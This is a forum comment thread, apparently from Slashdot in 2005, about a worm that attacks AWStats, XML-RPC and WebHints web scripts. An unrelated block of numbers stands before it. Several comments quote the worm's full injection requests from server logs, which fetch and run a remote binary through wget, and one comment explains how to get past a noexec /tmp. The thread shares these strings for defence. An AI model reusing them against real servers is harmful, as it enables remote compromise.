54452 54452 51669 51669 20767 20767 96241 96241 72135 72135
92127 92127 52121 52121 76879 76879 25238 25238 42595 42595
08869 08869 21689 21689 16334 16334 77427 77427 56470 56470
50724 50724 49221 49221 30932 30932 39564 39564 19423 19423
13439 13439 67032 67032 05322 05322 40985 40985 90064 90064
94614 94614 99157 99157 20574 20574 59352 59352 79309 79309
48629 48629 31259 31259 26644 26644 58377 58377 73247 73247
55599 55599 34649 34649 55873 55873 61385 61385 19036 19036
92464 92464 03611 03611 09276 09276 77138 77138 87096 87096
70851 70851
K-BYE

Re:OUTGOING

Could it be a one time pad? O_O

Conditions for infection...

[xutopia]

"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?

Re:Conditions for infection...

The problem is, everyone starts somewhere. Not everyone who runs a web-server is a genius at administering them. I tried for six months, and finally gave up. I just didn't know enough to keep it up to date and not crashing. Granted, half my problems were caused by data corruption on the part of my host, but I didn't know much. I would assume I did not setup Apache to do this, but who knows. So to assume that no one is vulnerable to this is nonsense... not everyone is a technical expert on every aspect of the computing world.

Re:Conditions for infection...

[maxwell+demon]

Hey, I've found a way to write a true Linux worm! It can infect all Linux computers which have a user named "wormhole" with password "unsafe", and have a suid-root copy of bash installed at /bin/rootbash which is executable by user "wormhole". Ah, and of course the user "wormhole" must be able to remote login through either rlogin or ssh with password authentication enabled. To spread, the worm also needs the file /etc/wormspreadrc, which must contain a list of other vulnerable computers, one hostname or IP number per line.

SCNR

Re:Conditions for infection...

[smoking2000]

The command it runs is:

|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

It is passed to awstats.pl in a request like:

GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1

There are also POST request to xmlrpc.php pages, like:

POST /drupal/xmlrpc.php HTTP/1.1

So if you have /tmp mounted noexec this should not be a problem.

Re:Conditions for infection...

[Ramses0]

Not configuration of apache, but configuration of PHP.

Basically, it's whether you allow the following:

A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful).

#2 is just plain dumb.

I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) in their later releases.

--Robert

Re:Conditions for infection...

[Ramses0]

Damned slashdot eats my code examples. Re-post.

It's Not configuration of apache, but configuration of PHP. Basically, it's whether you allow the following:

[?php
    $foo = `ls`;

    $bar = include("http://foo.com/example.txt");
?]

A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful for hacking stuff together).

#2 is just plain dumb.

I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) by default in their later releases.

--Robert

Re:Conditions for infection...

[PatMouser]

Well, as of 9:30 AM central time 24.224.174.18 isn't accepting connections, so it's either been slashdotted or taken down.

Re:Conditions for infection...

[6*7]

a noexec /tmp doesn't protect from running an interpreter with the script source in /tmp. Next version should simply include '/bin/sh /tmp/listen' instead to be fully functional.

Re:Conditions for infection...

[harlows_monkeys]

I'm thinking this is funny as hell. How many people configure apache this way?

Uhm...pretty much everyone using AWStats or the other programs mentioned has Apache configured that way. The problem being exploited is not an Apache configuration problem, but rather failure of certain PHP and Perl scripts to validate input.

Here is a line from my Apache logs, showing a breakin attempt:

hist.ih.univ.szczecin.pl - - [08/Nov/2005:06:23:58 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%2 0YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2fli sten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216% 2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 1021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Basically, most scripting languages allow for metacharacters in strings that allow for embedded scripts, and programs that accept external input need to clean up strings that come from untrusted sources before using them in contexts where those scripts would be executed.

Re:Conditions for infection...

wget isn't in the *BSD installations but in ports, which would make this linux only

Re:Conditions for infection...

[sanctimonius+hypocrt]

Per Making /tmp non-executable:

Mounting filesystems with these flags set raises the bar a little, but it doesn't stop files from being executed.

What you need is defense in depth. Mounting /tmp noexec,nosuid helps; Keeping everything up-to-date helps; Scanning your log files, following the news,... You get the idea.

And of course, hiring someone competent to do all this is a fine idea;)

Re:Conditions for infection...

[slackmaster2000]

Mounting tmp noexec won't stop scripts like this.

Aside from keeping a system patched up, it's important on a web server to lock down all programs that aren't necessary for the operation of your web services. In typical setups there is absolutely no reason that the apache user should have to execute wget, although it will be able to by default.

Re:Conditions for infection...

[miyako]

#2 is not just dumb, it's also really common. I worked on a site a couple of weeks ago that I was asked to update that had been in production for a while where the guy who wrote it had actually used

include_once($_GET['location'].'/'.$_GET['file']);
<blockquote>

for all of the navigation. Apparently he had been using forms for navigation and had each button holding the value of the file he wanted, and a hidden field holding the full URL to the section of the site. So the code ended up looking like

<form action="get" name="navform>
<input type="hidden" value="http://www.mywebsite.com/somewebsitesection ">
<input type="submit" value="page1.php">
<input type="submit" value="page2.php">
</form>

On top of all this they were storing sensitive customer information in plaintext files. I STRONGLY recommended that my boss send out letters to all their customers informing them of the vunrability so that they could take steps to ensure that they got their credit card numbers, etc. changed.
I think that the big problem is businesses that higher highschool students who have no idea of how to write good code doing websites for 6 bucks an hour. When the finally decided to higher someone who had some idea of how to do decent code (I don't claim to be an expert in PHP, but I certainly have more experience with it than a 16 year old, and I do at least try to keep security in mind when I write code). I ended up leaving after I'd fixed the security vulrnabilities (since I didn't see it as being ethical to just leave a business running where it was so that customers could unknowingly have their info stolen) because my boss was constantly on my ass (He didn't understand why I needed to spend time designing a database when flat text files has worked on their site for so long, for example) and basically told me to take shortcuts to get the code done ASAP.
In the end I think that this is is one of the biggest problems with software vulrnabilities. People are more concerned with getting it done than getting it done correctly. I think that one of the advantages that F/OSS has is that, while some coders will still perhaps be more concerned with time than correctness, there is less of management glaring over your shoulder and telling you to take shortcuts to meet deadlines.

Re:Conditions for infection...

[Jesus_666]

Cool, where's the torrent?

Re:Conditions for infection...

[destuxor]

"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?

Actually, this isn't something you can control in Apache. PHP's ability to send system commands can be turned on and off in the php.ini file. Although anyone running an Apache webserver with PHP has that file, they may or may not have editted it.

The php.ini file actually gives system administrators much greater control of what users can do with their PHP websites than they ever could have in Perl through a CGI, since a simplistic explaination of how CGI works is that it executes the file your browser requests with whatever arguements you send it. Furthermore, many Perl modules are nothing more than wrappers over shell commands. If someone were to, say, compile Perl without the system() command, you'd have so many broken modules it wouldn't be useful.

The point is, someone installed AWStats two years ago and never updated it or their webserver could be wide open to this thing. That's why we blame the admin :)

Re:Conditions for infection...

[smoker2]

Nah fuck it, I'll just give them my ssh-keys and su password, then they can login at leisure _and_ get root.

More seriously, I had to turn off the ssh daemon on my servers because of the assholes trying to dictionary their way in. They weren't ever going to get in, as I use _only_ key based authentication, but my log files were getting massive by recording all the attempts. There are only so many complaining emails you can send to Italy Japan and China too.

The old adage is true still - If you're not using it, TURN IT OFF.

Re:Conditions for infection...

[biduxe]

Nyet, i tried but it segfaulted in my system... Do You now where to send bug reports?

Re:Conditions for infection...

How about adding a free copy of war and piece to the output of every failed login attempt on ssh? something to read while they wait.

Re:Conditions for infection...

[maxwell+demon]

How about adding a free copy of war and piece to the output of every failed login attempt on ssh? something to read while they wait.

Well, I guess he has to pay for his bandwidth.

Re:Conditions for infection...

[jonadab]

Wow, that's such a basic problem, it would be caught *immediately* if someone had taken even the most basic precautions, such as running in taint-checking mode, which is *HIGHLY* recommended for anything that handles data from an untrusted source, such as the internet.

Re:Conditions for infection...

[sunhou]

Well, as of 9:30 AM central time 24.224.174.18 isn't accepting connections, so it's either been slashdotted or taken down.

My web logs show some attempts yesterday, but with the wget going to 24.224.174.18. I haven't read up on this worm, but I'm guessing that's an address of someone upstream who was infected. E.g. if my machine infected a new one, the wget for those new infectees would point to my machine.

Re:Conditions for infection...

[timbo234]

http://denyhosts.sourceforge.net/

Re:Conditions for infection...

in fact, a variant that runs the code through an interpeter is already in the wild; comment 13978868 shows what it looks like.

Before all teh MSFT fanboys jump on this,

Paraphrased from the virus description;

IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,

THEN you might need to take a look at if you are at risk.

Paraphrased from the virus description of most MSFT worms:

IF you run an MSFT operating system
AND you havent reformated your HDD in the lsat hour

THEN its time to pucker up and kiss the sucker goodbye..

-GenTimJS

Re:Before all teh MSFT fanboys jump on this,

[Assmasher]

You don't feel hypocritical about calling M$ zealots fanboys when you write crap like that? LOL.

Re:Before all teh MSFT fanboys jump on this,

LOL says the Assmasher
wondering why
they modded him
into oblivion

Re:Before all teh MSFT fanboys jump on this,

[a302b]

...is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform.

Can someone help me out here? Isn't BSD supposed to be secure by default? And only when you know what you are doing are you able to loosen restrictions? So if, as the parent so kindly pointed out:

IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.

How the HECK does this virus spread on BSD machines???!!!!!

Re:Before all teh MSFT fanboys jump on this,

[Assmasher]

That's funny, and a typical slashdot experience. Someone bashes M$ when something that could even be remotely construed as critical of Linux, and then someone like me points out the hypocrisy of their post, and get modded as a troll. LOL. Next thing you know it will be modded 'Nazi'. Standard slashdot/internet model.

Re:Before all teh MSFT fanboys jump on this,

Did you post that from a cell phone?

Re:Before all teh MSFT fanboys jump on this,

[sootman]

Isn't BSD supposed to be secure by default?

Um, yeah, and AFAIK, part of that includes not having the webserver on by default. You turn it on, you're at risk.

Re:Before all teh MSFT fanboys jump on this,

[sootman]

From the best MS technote EVAR:

"Identified security issues in Internet Explorer could allow an attacker to compromise a Windows-based system... This affects all computers with Internet Explorer installed (even if you don't run Internet Explorer as your Web browser)."

And since MS included IE by default, enabled it by default, and made it almost impossible to uninstall, all you MS defenders are invited to take a long walk off a short pier. BTW, that update is less than 2 years old, so it's not like I'm really digging in the crates to find that one or making "OMG teh BSOD!" Win98 jokes.

Re:Before all teh MSFT fanboys jump on this,

[mls]

Can someone help me out here? Isn't BSD supposed to be secure by default?

There are multiple distributions that claim BSD heritage, each has different intentions in creating it's distribution. The only large BSD based distribution that strives for high security is OpenBSD. You probably would have a hard time getting this exploit to work on an OpenBSD distribution without intentionally screwing up your default configuration. That MAY be less true of a FreeBSD, NetBSD, Darwin, SunOS4, NeXTStep, etc. systems that is based on BSD as well.

Re:Before all teh MSFT fanboys jump on this,

[qwijibo]

BSD users download and run the worm manually to show solidarity with the Linux users.

Or it could just be that BSD users, like Linux users, aren't all security conscious in all decisions about what they install.

Re:Before all teh MSFT fanboys jump on this,

[Tibor+the+Hun]

Not really, I have BSD and a web server on it, but don't have the 3rd party packages that this virus exploits.
Once they exploit Apache, then one's at risk..

Re:Before all teh MSFT fanboys jump on this,

Not at all.
It's just that LOLs and jumping smileys are best left to forum boards, and not on our, dear to our harts, slashdot.

Just trying to keep the tradition alive. And please don't reply to AC posts, unles they are insightful. It's not good for your health.

Re:Before all teh MSFT fanboys jump on this,

[I'm+Don+Giovanni]

"BTW, that update is less than 2 years old, so it's not like I'm really digging in the crates to find that one or making "OMG teh BSOD!" Win98 jokes."

Sorry, but bringing up any security problem that occurred on versions of Windows pre-XP SP2 is digging in the crates, and frankly, a sign of desperation.

And why bring up Windows in this thread anyway? This thread deals with Linux vulnerabilities.

Re:Before all teh MSFT fanboys jump on this,

[Deanalator]

If people didn't have that configuration, it wouldn't spread.
If it wouldn't spread, it wouldn't have been found in the wild.

Remember, worms don't need to be able to hit every machine on the internet, they don't even need to be able to hit machines with a particular default install. As long as they can gather the amount of machines the creator wants them to, then it is considered a successful worm.

So let me get this straight

[AKAImBatman]

Linux has a smaller Market Share than Mac OS X, yet it's still getting targetted by virus writers? Is there something wrong with this picture?

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

*cough*Wouldn't have happened with a J2EE server.*cough*

And in one fell swoop, this virus helpfully explains to everyone why there is a market for J2EE servers, why people use Macs as their Desktops, and why Linux's reputation isn't quite spotless in comparison to Mac OS X. This is particularly interesting because we've had this discussion in several other threads with many people saying that the whole "no viruses" marketing applies as equally to Linux as it does to Macs. Similarly, many have said that PHP is just as useful for Enterprise work as J2EE. Yet these are the types of things these systems were designed to prevent.

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(

Re:So let me get this straight

[FinestLittleSpace]

Linux has a huge market share in the server market, idiot.

Re:So let me get this straight

[Blob+Pet]

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.

In the distros I've used, the user has to explicitely choose to have a web server installed. Even after that, the user's probably going to have to explicitely choose to install PHP.

Re:So let me get this straight

[AKAImBatman]

Except that in order to be attacked, you must have AWStats or WebHints installed. i.e. This isn't corporate software being attacked. It's technologists and power-users who run their own websites.

Re:So let me get this straight

[bperkins]

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(


As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable php or cgi script. I don't think many Linux system ship in this configuration. The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.

Re:So let me get this straight

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(

Web server running by default? Debian doesn't do that. Apache isn't even installed by default. PHP is a seperate install from Apache. This worm appears to be a problem with PHP, not Linux. Linux is just a kernel. If distros have Apache/PHP up and running by default, that is not good, but its wrong to blame Linux for it when the kernel isn't even remotely involved in the vulnerability.

Re:So let me get this straight

[niskel]

Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.

Re:So let me get this straight

[AKAImBatman]

True, very true. Unfortunately, AWStats is extremely popular on personal and small business web servers. Its presence is extremely probable as it's a free and feature complete log analyzer. :-(

I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.

What's really interesting, however, is the fact that the worm is very similar to the Slapper worm. The only difference is that it exploits common PHP/CGI software rather than Apache itself. A coincidence, or a new revision of the same virus?

Re:So let me get this straight

[ponds]

Although the kernel webserver was removed in 2.6, there are a lot of people still running 2.4, which includes a webserver in the kernel.

No one enables it though, I'm just being a smartass.

Re:So let me get this straight

[the+packrat]

Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.

The distributor would be the person who ships it, yes?

Re:So let me get this straight

[ragnar.ruutel]

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and execute

Its quite obvious that this is a real security malpractice. Even if someone allows external shell commands from web server they usually limit access to this kind of resources.

Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.

AFAIK, most distros let you choose which services will be installed, so its really up to user.

Re:So let me get this straight

[kyrre]

The Linux webserver would not be vunerable any way, since it does not support PHP.

Re:So let me get this straight

[LnxAddct]

All signs point to linux having anywhere from the same market share as macs up to 3 times the market share of macs, particularly if you take into account webservers which would not show up in places like traditional webstats because web servers don't browse web sites, same thing for HPCs. Also, most linux machines are converted wintel boxes, meaning that as far as sales stats go, Windows makes out really well. Take into account that alot of linux boxes are old as well as new, meaning that alot of people who run linux often run more then one linux box, some of which may be a decade or so old (or much older in some cases). The average wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a linux box today and a windows box, in 6 years after the first wintel box is replaced,Microsoft will have 2 "points" and linux will have 1 even though there is still 1 linux box and 1 wintel box running. Now if that linux box originally was a windows box, as it is in most cases, then Microsoft would have 3 "points" and linux none.

Apple often uses sales figures to make their market share appear larger than it is, those numbers are not accurate and highly biased against linux. But as far as your little rant goes, this is an exploit in php and only php. But it is even more specific than that, you must have a very speicific configuration which pretty much allows anyone to own your machine. This worm doesn't use an exploit, it uses people's stupidity that configure machines for convenience rather than security. It's akin to be leavning the door to my house not only unlocked, but wide open because I didn't feel like being inconvenienced by opening it every day. I've never heard of a box being configured the way the aritcle describes so this is indeed a rare occurence.

But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes. Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages. If you look at Fedora's page in secunia you'll see that its advisories include updates for Mozilla, Squid, Wget, Abiword and every other package. Considering that one project has the burden of having to report and patch so many packages, you would expect the number to be much higher. Looks like linux is still kicking both Microsoft's and Apple's ass as far as security goes.
Regards,
Steve

Re:So let me get this straight

[theguywhosaid]

The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.

What about:

The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.

Sure, it lacks the first sentence. But the hive-mind here does not like that argument.

Re:So let me get this straight

[AKAImBatman]

All signs point to linux having anywhere from the same market share as macs up to 3 times the market share of macs, particularly if you take into account webservers which would not show up in places like traditional webstats because web servers don't browse web sites, same thing for HPCs.

But you'd need to do the same for Macs. Not that I'm saying that Apple is selling more X-Serve Units than Linux installs out there, but the figures for Macs won't show up in the same way that the Linux figures don't show up. It's especially important not to discount Macs as the WebObjects platform is very popular.

Take into account that alot of linux boxes are old as well as new, meaning that alot of people who run linux often run more then one linux box, some of which may be a decade or so old (or much older in some cases). The average wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a linux box today and a windows box, in 6 years after the first wintel box is replaced,Microsoft will have 2 "points" and linux will have 1 even though there is still 1 linux box and 1 wintel box running.

I don't really buy this argument. Most Linux users I've seen reinstall their system for every major update, which tends to come more often than Windows. This is something of a requirement as software support isn't as long lasting on Linux as it is on Windows. i.e. Many developers make a concious effort to support machines going all the way back to Win98. Linux developers OTOH tend to target the latest GLIBC, thus requiring that the user churn through new installations at a fairly good clip. BSD machines seem to have a bit longer lifespan, but they also suffer from upgrade-or-die-itis. In the case of FreeBSD, however, the system is designed to be easily upgraded via a system recompile. (Which amazingly tends not to break things.)

But as far as your little rant goes, this is an exploit in php and only php.

Incorrect. It's an exploit against the AWStats CGI script and the PHP XML-RPC APIs. Apparently it can also exploit WebHints. (Whatever that is.)

But it is even more specific than that, you must have a very speicific configuration which pretty much allows anyone to own your machine.

It is a very common configuration. Hundreds of inexpensive web hosts offer AWStats, and many personal web servers run it to track traffic. There are a LOT of people who are vulnerable to this exploit. Especially since people think of AWStats as being something hidden that only they can see. Why would they upgrade?

But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes.

What's interesting though is the exploits themselves. Security experts have to really work to find an exploit, and most of the ones they find are impossible to actually exploit under any normal circumstances. e.g. If you check the link you provided, you'll notice how many say "local exploit" on them. As in, you need direct access to the machine before it can be exploited. Under Windows, already having access to the machine is the end of the world unless the user has explicitly locked things down. Under Linux, it depends on the quality of the security configuration. A smart admin would be using SUDO and time-lock screensavers. Not all systems are configured this way, however.

Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages.

That's a non-argument. Macs do everything the users want them to do and yet remain secure. That's the key point. Sometimes less is more.

Thank you for the well reasoned argument. :-)

Re:So let me get this straight

[tomhudson]

Linux has a smaller Market Share than Mac OS X, yet it's still getting targetted by virus writers?

is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform

... just so you don't need to feel left out.

But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-windows users on a weekly basis (Maybe they enjoy Troll Tuesday?) because they know that their time is almost up:

• People switching to a mac won't need their productx
• People running linux won't need their products
• The 800-lb - oops - 1600 lb gorilla in the Window marketspace - Microsoft - is coming out with their own antivirus

If you were in their situation, what would you do?

Re:So let me get this straight

[FooAtWFU]

I'd try to sell a network/email scanning/monitoring package, myself, for the 'enterprise' environment. Company-wide antivirus for the network.

Re:So let me get this straight

[therealking]

I love all the damage control the fanboi's throw out there.

OH THIS ISN'T A BIG DEAL
OH THIS ISN'T A LINUX PROBLEM SPECIFICALLY
OH IT'S ONLY ON THE 3RD SUNDAY OF THE 5TH MONTH
OH IF THIS WERE WINDOZ (INSERT NOT FUNNY JOKE HERE)

Come on guys, admit you got stung and deal with it. The more popular Linux becomes the more hackers will want to get into it. And since all the source for just about everything is out there, it's alot easier for the smart ones to find, test, & exploit vulnerablities.

Your no more secure then the rest of us, you just weren't on the radar. Now you are. Expect more to come.

Re:So let me get this straight

[tomhudson]

And since all the source for just about everything is out there,
...
Come on guys, admit you got stung and deal with it

How did we get stung? Not being dependent on Micro$hit to deliver fixes to buggy 3rd-party scripts, this was "fixed" back in February. *Yawn.*

Re:So let me get this straight

[k1773re7f]

• People switching to a mac won't need their productx
• People running linux won't need their products
• The 800-lb - oops - 1600 lb gorilla in the Window marketspace - Microsoft - is coming out with their own antivirus

  If you were in their situation, what would you do?

  Considering that there is already ClamAV in Linux space? I Probably be weaving a golden parachute.

Re:So let me get this straight

[LnxAddct]

Thank you for a well reasoned counterargument. You don't find many of those on here :-)
Regards,
Steve

Re:So let me get this straight

[bperkins]

The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.

Call me a heretic, but this is roughly correct, with some caveats.

OSS systems tend to have patches availible faster, so the bugs that lead to worms _can_ be fixed. It's just not realisitc to expect that they will be _always_ fixed (or even _often_ fixed). There's also really nothing you can do about the "I love you" strain of worms other than user education.

Too many ifs

[SolitaryMan]

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...

which in practice means that your admin have died a couple of years ago but was never replaced.

Re:Too many ifs

.. or your box is one of gazillions of dedicated servers maintained by hobby admins.

Short of detail

[QuaintRealist]

So here is some, shamelessly cribbed from e-week. The worm actually attemts to attack three different web services:

"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.

AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.

Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "

This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?

Re:Short of detail

[jurt1235]

This list is affected: http://www.securityfocus.com/bid/14088/info

Re:Short of detail

[nysus]

The only thing I can add is that Drupal CMS is affected by this but they supplied a patch quite a while ago: http://drupal.org/drupal-4.6.3

Re:Short of detail

[ajs]

I notice that MediaWiki is NOT on this list. This corresponds to my experience. I had some older weblog software exploited, and had to mop up after it, but my MediaWiki installation was fine.

Of course, MediaWiki is the pet target of some zombie-based spamming attacks right now, but that's not MW's fault, and I can clean up after that ok for now. If it gets worse, I'll have to start using some kind of visual authentication scheme.

Re:Short of detail

Because it's probably an issue with libxml-rpc.

Does it look like this?

[Mabonus]

I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.

193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
For 60 hits.

Re:Does it look like this?

Yes, it's looking for an ancient version of awstats.

Re:Does it look like this?

...wget%2062%2e101%2e193%2e244...

As you can see this is trying to download a file from some machine that according to whois is/was in Norway and seems to be gone now.

Re:Does it look like this?

[smoking2000]

I have a variation on this one besides the "flupii" one. This one uses a file called "listen"

GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%2 0YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2fli sten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216% 2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1

I think there is also a "scout" part, which finds vulnarable hosts, as I also have requests like this:

GET /usage/cgi-bin/awstats.pl?configdir=|echo%20;echo% 20;cat%20awstats.pl;echo%20;echo| HTTP/1.1

Re:Does it look like this?

[Been+on+TV]

Yes, it looks like that.

Re:Does it look like this?

[lemonjelo]

That's funny, it looks like this to me =)

[Tue Nov 8 19:14:47 2005] [error] [client 154.37.34.90] client denied by server configuration: /htdocs/awstats
[Tue Nov 8 19:14:48 2005] [error] [client 154.37.34.90] client denied by server configuration: /htdocs/cgi-bin
...
[Tue Nov 8 19:14:53 2005] [error] [client 154.37.34.90] client denied by server configuration: /htdocs/blogs
[Tue Nov 8 19:14:54 2005] [error] [client 154.37.34.90] client denied by server configuration: /htdocs/drupal
[Tue Nov 8 19:14:55 2005] [error] [client 154.37.34.90] client denied by server configuration: /htdocs/phpgroupware

Of course, since code red came out, even though I was not running IIS nor Windows, I decided to disallow any requests sent to the IP of the server itself, IOW, only requests to a hostname that is setup as a VirtualHost are allowed.

Linux?

[noz]

I dislike the labelling of this worm as Linux/Slapper. The only platform identification is,

This worm spreads by exploiting web servers hosting vulnerable PHP/CGI scripts.

I also know that tomorrow a colleague will say something akin to, "Quit razzing my Windows platforms. Your precious Linux also has security problems." Grrrr...

Re:Linux?

Karma's a bitch, huh? Or is this just some Windows user who accidentally stumbled across the fact that you use Linux, and you've never given him any crap for any Windows vulnerability ever?

I hope your colleague is every bit as smug as you are when you dump on Windows.

Re:Linux?

[flyinwhitey]

I have to wonder if this

"I dislike the labelling of this worm as Linux/Slapper."

is only because of this

  "I also know that tomorrow a colleague will say something akin to, 'Quit razzing my Windows platforms. Your precious Linux also has security problems.'"

Re:Linux?

[HardYakka]

Yes - it should be GNU/Linux/Slapper.

Re:Linux?

Haw, Haw!

I bet you ignore such distinctions whenever it's an exploit of a third party utility on a Windows platform.

If that's the case you deserve to be stuck into a room constantly being pelted by chairs thrown by Balmer for being a typical hypocritical Linux zealot.

It's not the MSFT fanboys you have to worry about

It's the AAPL fanboys you have worry about hereabouts on slashdot: they are all moderators a re-up on quality crack just came through.

I'm not worried...

[PoprocksCk]

I doubt I'll have the libraries required to run this worm.

Re:I'm not worried...

[WinterSolstice]

Ha!

Yes, if your luck with PHP on linux is like mine, you'll have to resolve dependencies for about 15 minutes first :)

-WS

Re:I'm not worried...

[pintpusher]

If we could get a worm that resolves its own dependencies, think of the benefits for spreading Linux. No more RPM hell or the occaisional apt-get flake-out. WIth the right worm, even my grandma could start using Linux! Yes!

Re:I'm not worried...

[_Sprocket_]

apt-get install morrisworm2

Re:I'm not worried...

[jonadab]

> I doubt I'll have the libraries required to run this worm.

